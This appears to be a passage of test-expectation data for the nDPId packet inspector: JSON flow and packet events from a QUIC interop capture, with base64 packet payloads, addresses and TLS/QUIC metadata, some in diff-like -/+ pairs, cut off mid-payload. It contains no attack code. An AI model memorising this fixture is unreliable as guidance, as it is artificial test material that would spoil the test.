00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8YxAAEAREMXAqAGAR8opqZMdEVEE7ChGywoKCgoIqaWx\/UJ+JLQAAETSRegWnRcPLKk7uYLS8VZ6A+zIwJb1mPqvy2MKL3Tt2jbz4sn5hDNSysWyy0Q1vrUZJyUEmOGV1jj\/0B2GZUMMnU+bx4P64TDztfWRCEsX9xqURkrteqGz6ltOPoTMK6uGDuQl8788DuRU6AkQ1v9y\/IX5DuObM3NrRxVsTfrPVsxKWrlvhhc8+bzP4RcGvyJ\/YYHHHWv8RiMZV8ZiNqzD\/Tz+RFWP04TpQ4H0wJGgAkCU7iYd4ab1bDvSCbzjD468MBlMvdV6E9+6rcgmFKBMzQQdE+3VD+cPof5Frq5N6HQby2yYtJudG6NrUX73fAa2KQZnzYR4AbsJmaaX8pjzhRDzDU9lkoPYf4Oc4\/nC0DEA60ezuIdY6ti8wvtU78brnoSIwXQNufJ3MzKMZWZJpg9zM9qPOZYsquFKurbo78k5\/rJeEvIak8OZ1yOE2HfW77PYo2g+KEWaP\/fvQAQmwoeHxVcoRheC4X\/2hnLsZC4VDGWTctTohPZkhIIguZevQcdGStgdNPOoe23oCG+cigtTE2XZqR98GoabuEhLVpX8IFbc399f2Ed3R9zv0BqRW7l9W+VGBCK8l7hYQJcjAGrqb6UxP9n5twWwwy63e4tac05Mv
3YxsBf\/gpWY1CeGoH4A3AOIfnYfHjCBkCKDei184tAdAwJXAV8xwNIvdB1dw3Mc68J\/Pfqo1EfLZjZfaNqOe3f8viMQO4rriT8gdNtZ0CgbJJiTTs0v3CCooFyBSmtQOJYSnaqzYT+uTl0hY8Pv7OC+YTEfEJsGmbz3bNDq8LTl15HzHDF6\/S0tKU8O8InGVtk\/4xlinam6Cr3IODbyJ4bhBkIKy8MFcG+qdHGW4VYXvs5ZK3HFwh9xB\/co3gy3WkEyPgUxAVTluIvDqC8K6I1mGrN5z9mmI7+cQWr+bnYAVDEJN4rmkUxjOxyuiiOc+eUaT617fUn1I8bpVOZvNmAr\/m0w4TmV040UAJX8kNuv73I76cuzAXTqPGp1OIlB8p\/rUaLeRtwOv26NjRPMlDjdM\/2\/Ilg8tpUGW7j\/eqU5QmqHo\/Tiz3kNBpIfGMBMuOWA\/+PbBvi4AgIZ5msvRnQ6tvRm+GWBEDzs\/IRYnKTailefoHxjXB0DNFDc4zDa+tiGPQt7PmYE5fk8D2cP4OlLJtPGya0qenuuBZpE+9egccg6vsbROrFnslZRL6+0pFRqbKJZSvkqUbHUrlE\/JfB\/RdVa6sOFQkyGbFLPZtdG76DZnk7EFNB+78rrmYjzs6QdbL0HyurZ1UeWbBWI2fQCt4n30u475\/uIDFvQNfHznThYw1T3lHUvAqHOyJ\/ccQ7CPkJlpFBs41COx+7rd4GKmxiD62jg+b4QoriC8bYd6M7zXH9NxgT2wgi7+ApxeYKupXdFHK42Vnp2KF58erKh\/QyLOmaga5TR43mFPJ1U4Glvlilv1YLFtMnz+s5m3xpG9nXQX\/uLnoR+QzZ7ZpahZpcCH3jpOUBrBQLDS3SRPYGHiIfQ3MTxt\/K2HL9xf8n7chjG+XDpVfD+Ow4ZDOisoboLR0pMTJoCSzc7NiqX5QJC8lHEJcQJ84dLF0V8eZdiDwD0a\/E3DacaQJIW+8v0unPtOxdaQoXsSVsGNysZHm0clQcBwxWaX8rC0w=="} -00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1603816434601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434601,"pkt":"PKn0qB\/spJGxgjQ5ht1gCaFmAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVHH8QAfHOHYAAAAAAAIMG1gGePLGT0KGio6\/wAAHQ=="} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1603816434601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434601,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAQM5AAEARcbfAqAGAjOM0XJOYAbsE7P6myAoKCgoI8EYvtCcjifcAAETSFB6sl\/lkLZ53JqQdlE2I446feeWqsyvCToqdH\/63WgFZXzAd5XJaz2hSlpGEY3otY+eR2fXJeeeLgKjgc1xdXndquYfP60ARoUpa1CNURQDv3dVUcZH4ZRr7gXB5ZoVF7\/jeJ12Vn6muRxM8UUAONwgdRKDgiL0UJP4xo5\/U0EJMBAoIApMkTic7rgG2Bh+mE0INS4tt2YDtZQWRkNwxdusXBvMW5Xh6sJWHpZCpVde45Vj8XrkpX2zzc2M+YhMwcBgNKHixMOLCc1OsZDjp+pVjqtaNwuJrMIuOI6usSTI66JX+7JfjdPq7itf0ZF7lYG6PNEEU+xPizRn2KxsuDnIqtilwE+LUxpsYFKfGcG5ezqqO6yKGneF+EwF1DUUwFWNzaP0yDVP0V7O256HNYYY9PS+2D1mPJ5Qh2m7ZEHCUVkRSNQ2ShIsxlvawRDyCp6kGwT\/WLvCLzHx+eyBaO007Tt\/wxiyopmu\/PGttRCmy1mbey1xkep6SVHg2hljMI2kKhPkHRByGHf4LjQ5nMnAXf0Tq9kl8M9jkU3GAPVgFzvq3cQiBPTdYAx\/xzWiHb6MZotlQJrKtj8r5btIK5VkYbo4NO\/HZLmSzj+v2qCIKxc1Kk9zuPTC3cbP50XiuLwGkNCPCfW+6OO5M9kmhEpBXsPSz70fHx0\/0D2eDDtF18PM3Frvb1Fy16GhVoNeVMEwWNkS3FwumWjt1NyRbw4LvKt\/Rmj6KQiUZvu7MbT1ndIcWoPm+a9vrINvQyHbJftHfdf2llfXEA9XL2i2KvpzX8iugx8h\/EwmNNUg0F+x1PWifXySR9l8Caxeyeh8E9jH293IxSPPA935LAymnnfgPtyfd1UPNS9YuR73IJfEhrnUAjx6P8XPDbcP+xgeY76YS+U3MH7XP1Q
4EtbU2P0qKkUuklKbSr5dA\/KAEw+eLuqUjqAIZj+rndafIhO\/LsQfPYOW7bdEx4iMsGisRcOkkgcehuB399WIzJNDaiUudf5GjJuMlrlW6TLhJ\/g11dD2dIjh8WIkp4Qn0ZkpnSlcQsZ6BaomyP1UZMobw7Gb2Mj8fiVHGtut5pXwWsRBQRFeBEEDjwKjkFEFJa+NTqaiorO29xYtpR57ookqNhP\/dfrYv88CXL7XheZvTVIEYcH\/93v+Cx7XpZlqq9qM40K8mUb2GtWK8vMCP6sNaXS5hLGz84Ddirh9wD6+wfnjrttIpQkYIn\/n0QN2b1TKqZ4lV4cVP\/FewN5U4p+laZISTDvXTwJ40b2O71mGyXFIkSolo8eu55u2aHixwNCDhO56mWWHK4Sjf79khIgUIR39vcpUSQ6FVfGU5puW13EEw+81VUTMmbCdmBMwZ08nDTbGTXvAz8fOGdlwm11FF6ZM3uLiRXp1gGZjK30iogDlgUho8fiLM4+4Funma+wzaEJShb\/ISV4iTPJc+5A6A\/ef2opV+jxdSnTVcIVgMqB\/J2pk14MFTuYdq1mbrGXTX4\/KzcWcwz8+SNndOIz9Wc7K5XCuPKwn0ey2jndDMY01z6moJcN3uM0nJF8eHMcSe6+CbejSVpzM5ThvLdtFQ+ViAhGrDwX9+mUtbkulWDQiHIxtnNa+G+LGQ1ouuwgszH64VBoxich6WLV\/F59MlHS\/lRQ=="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00647{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1603816434602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434602,"pkt":"pJGxgjQ5PKn0qB\/sht1gCm9\/BNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmd7jcRUQTYoyXJCgoKCggXpMPD7IbgFwAARL6WX\/ntaXcB2j6uyN\/eyiy9Z65LFFuHMHqjLQFwZXwPmrbwF1D9AvrfhiGZgRDKOtshDVcv\/5o63Mt5lp96z15M3u52GksY8IeFOYZFLzRLSypCHdSUAudS4QYS9yvJF11P6aEq9v5\/cYDKzMAnbW\/\/2YzVVKyxaNwCoqy+9J2FpElrzMoylxHY8jGmzsLZt+Cq4S6W5A\/yie2rgPdsV\/\/kadibCJuYe2QgLqw+NgOvs3ZCW318tssCX9NeufGXtdg+E7g9jwjM+K4Ord93OwDnRF2aTJmHo2tCEGjCWFEkbK0aHLxzz+KabEo0\/LETVbiLPpKC44rKQXGCZ7Lmqskpi4aWMEcEh2AyNzzT6UX+VTMz2bzdgqFYxEdMOkTF8mZvPnsAyl5GsftpRvrRDq4JM2HS2xjqKNf8\/rk9IDD2z1lCuhYklz6u8Xh8AV2CVmPjku7CduxRqf8iWhU3IZh\/tB0Zovqp1ibQbIYt4zrU3MxUs0Ann688P+rb7y+ZsnFu\/fk+h6xbT\/viYivE\/uJYhISmd0y\/Ibw7oVkhUvcwYGe6BlxHbu9DCl0q2k0qM2EbRuJ7WjnFFIsOxPhC8cKRdPoM0zznMb98kz5ysAdYKg+SkdeKd+4pa4gn+PgKnZ1v9QHbHVyu18amv\/ydgTDP9BOE5otsm9Ste64D+uoB3LV0jr7gSVBlTP43OHoBDZrEnIZWNb0IXAfnfRqK5U1mX9jYgyrjMmaabtaW5SNCjpVcHvLrXXfdvgnhoksaNA8gqrNxl8kTwyqsCW0T9SKJrw9GgmLUZOOEXkBCdtDC8Rwy2m5YGCQMlqBCp9fcD7R7OWZl9re2KtmbZcx5XuRoJK+Ee\/RcP8U39Qot\/kENeJ0xwBwp0WES98qMbpvwX+NXwrulmff5OZz7s0aOup6\/XRoJevNt6uaC\/AmTv08qFISr1ifH4eiMCq2kmxW2ahH9hEVWZR3Jxv9iJSCKrtvEkXwyQlIE2Ox6SYeipj2kQe7zZek+5dXGQsbScMIja5ekSaVy1D8rj1LjvpGiPeJY1UasRXnpVF59+PQLwsfANope5yQlCx+YVECOLk0\/GMBEoIlKIoZLqVJG\/C0u7wyX+2E6ZdHmRDFkH6mFBgjUTGXKtzBCjRac0BnMVz9YKLNQsd+\/rrsH5pxJ9YO0MuiSwIPs+xpIdo\/IEERboBN3aoJgydQ37ceY80ila+nQ3U9dSxR06jfC77UBEfVmdzlkuL\/DhQFWPNRfInKTTvG3yav2KKHl1x8TO6Ii\/6UZ\/zxT\/dSPlF2U3u1lI3XWOna6XPE0cHG4jVhbs8Y9WhQwEhQEXLQePEz9F2uVXMGjij63Ico7971IAKm6HyBzRv2Z2ImKjQZ0Rn1bzFvrV1KmJeslV3i9\/gn2wrszpq9ZZiQligWna9g2XDzA9fJDQnnBdg+QtaCieo2h4UjfZlagVCzJE5jJiKvMJjSG
+vhOBRM\/pLtSq8qtMvvY3qHtTPn5\/9+fdA0SINWbW8xs11auU+NEYm5CyZ4WhnBvSSN8gec+a6gg9j80lhWWSEnL5q+wUaDeIovDUJ\/pMAff2X2gN+lfmO\/YkWJGLKHp\/WpzMbzWOkNBwTL8XEECXXPg9Q=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbNAAEAR5fDAqAGAwb4KYsH6AbsE7KsqzQoKCgoIc5O0PcfI+J8AAETS5F5\/qillFB34ZBYonPftxqjX8kBkyIk23lkZ2qSswRv0KEUWFyy4088Os3ZnRrOQrOwaYeXZhHaUBeXrptUSJZkTrnEJcyoWV9p6dEfGmv7bCjVxnlCwVoAAaJG8GHsjcbwBPQJPZ6oZM5lf6cBUHAqYHNw6rDSUKD3xvkDAy0tLs96F9A7S0NsDa6ZvGzs91gfUUlnKUaJulVEVfMWbhAjpxgUG+FXt9Oo9sL+OPkMVV\/7Vt0yoW1XaITbIq8KI8LwQAzQXNX+v7kBeFwKwuJRDs2d2j85QUWSVVg6OehxN0oTkJ\/iEWaH7HwRGKNP3wBEMihP+3wB41yI1iprDNfCK26psAUg8WkevVXjHCw\/1R8rXTAqTx4QwA+k906j11b35dxI9YbrIjP9IU\/OcLYQFjdfqfddeEH8L8+SaTdDj+FCEgqbdUYwvn3ShJJ8oqSXEByw1fDw6a6R8YQY\/NcWHQmWlwZV\/s8V6pCK5XJBFoyooYlTtK5HT3AzggQdsGSXTc5vPgI9QOgVcbjbdWp2Amvc9V\/q1oTUYUqgUbgO29365V32Dune0xvsiGBLhkxW\/xB2VR3VD8bIGBOkyav0B7u323dLTivvutQgLSxIpoC002ajbvnwVN
bm1ZcAbWyBNcs3+OXM\/vE9S84TFCziB6d7oYbaE4yI6WoMFbiyLE0HiXUYenUnbBg82zVNaZ30wtH7\/mEwwYXBlHw79PgUwLtAbNWwFraM3BZwEm3JyH67VIsyLo7T55Cx3r9oakgfDnsS6P4bT5c4dkQ6l8BLSFIYKSUtqpqBbExMHSrqaMXKXu8BL\/5ieVLJhNsi\/slQ9w5NDtQoTTbDkDU1uXliwiII\/d1kCgsYupKOqyL1yOQzPZKCInlHZsUbMdJ7y8bMnF2vGBX4GG5L01jtQDpBD38uCXLmnzO+9c3yuX3Qh5zcfT34vJRSeWP4va7S\/nOP4nZYATnqlIGSv\/xJzfLmDB79k6IefwfU2xRise5mIw2N37hs+9xRHmkwSbEY658tuxL8Xb1MtKxUQDPq8BcSvLe9eQOWinR94+9pJhj3IXfg8WmTW3\/5K+B\/rN2gnFxD27OZ+9NCOJP8NZ6N\/BTFtZSfdJJpZYHIN8TnZLxRlID54H\/GDdCUsJNUfhoKrsuqdCGDfNktOUx0MVrR62a0uRztIF8liJfUeO\/\/KAKR5QW14obLuVSayoUimbOEHLMJCVQc8\/yVQYizs3KLKMpIRLych5r0TNMP6kwhIq3oRLx1tuGXR5Ce8Ty5Ru0TOGnc5fQ50Lqs6GkZSf0wsPD2nX6txa8FkQa+B66L7AJOYLxiX+7eCvInUvChFc+0Sb+WrPE+4s+jAEcZnUDM2coA7EAkqHnQ9J+lIjWQPxMKhSjx58dKOyLuMftDrpApD9cIaKdSgopyq44a5UIqEi1D2XHwo6tGidN7YNyIAutBBxF5IsroY6pOfcfi2fwuYnSzbutfHvCf8YirR\/BAaLMu3aNHHB\/ZKPVZpI\/gucAgFFvFH\/M+\/qty4rxYviGGCAa3\/53kY+NHOxljIVMDVyWE9T\/sqE0XTooS\/SgQ38mqYWA+WDPfMqjhyITNqp6FmsU\/gt0JrpoezFzEe61zJNnCelVJXtRUHkhDcxRW2fFs7Rw=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUATrtAAEARiKTAqAGAg58YxqJzEVEE7I\/AwQoKCgoICpCmEqV\/5+UAAETSrUzMAXsH+lNXSQbnFrAyl7ceSEtrPkuYxRTLDdaFiiLmduk9Xs2lXgYzbsBek6Ac79LMu0h2S0VMLhMIoynub2oycJvB5K8wYKEeSkLlTvDrT+4\/PAaXju5wh72tiJmArJiM37yh+0ZsoHgCUSqF0WzYygVii9e2gqRAE3tVIHQjG+5jZMLcaJ2yFfHfBMxd\/O6jX\/qLUotOaY1vFKrUIY90\/U9Dbi4MsFuL6Z4A02fTqtuX4r21R2SazEf5RJES7hcKSmvCokMZmOKlyLilXCKYcenmZhN8UNa3xfFEIcmY5JwTnC3sMsOo\/rBS\/9H1GO4ZE3+cPgE5zkXgqeuWBcFKNYDy7D\/WFSz1wdWlgFLSW2hrnDFcjH74QFpHFNYSLfoZVnrmXaJWdYqR3\/GrunzyfQ5NLPD0xfrMvW+mfxDdvmFWlM5+TRdKLnFtqU5+MG9orjbkU4chKQtFPiEcFOtk8NTHDHAGDTwbYffqe87exnYOpkIf3ZSAN+Xc6uclNDmRl6vRFeIZ7wnFa\/vovEOpHWQnRJdHbza2NFUFRaTbJ66fHDPe80KPiiYdWaTjiZGLbnVxj5cnNPjgcS9riI0x\/vjDtGbui32zd2k19XAk8XSvXovnq\/N1aEblwY4nUP5VKVuQkxHivQFDAXb94K1J5M36udsQd6LdTQRFPp1uq8xtKCFuK6p8iHZhrHLCcSPXYOeddA4eGHDK9as2MSP81cihu\/T7DLy1YjlKcHYzDa3yx1xCoO5FKkG6fm9bswGYlU\/+baDbYfTkQsLCEaPlRnxA9WTERJJ+MSFDRHu\/PlPFJ7insUQmyVmaD3hw4umIBuOag4GPXKlW2orVcqPhx98PvrVSXrWoJ9fVfyaRdjVGS9oRlA6aO0YTRViOTKSEUuyp112T1TQFZCnuDnAkxVoRPmo9aTNWuTZ9TG1q3dK8ix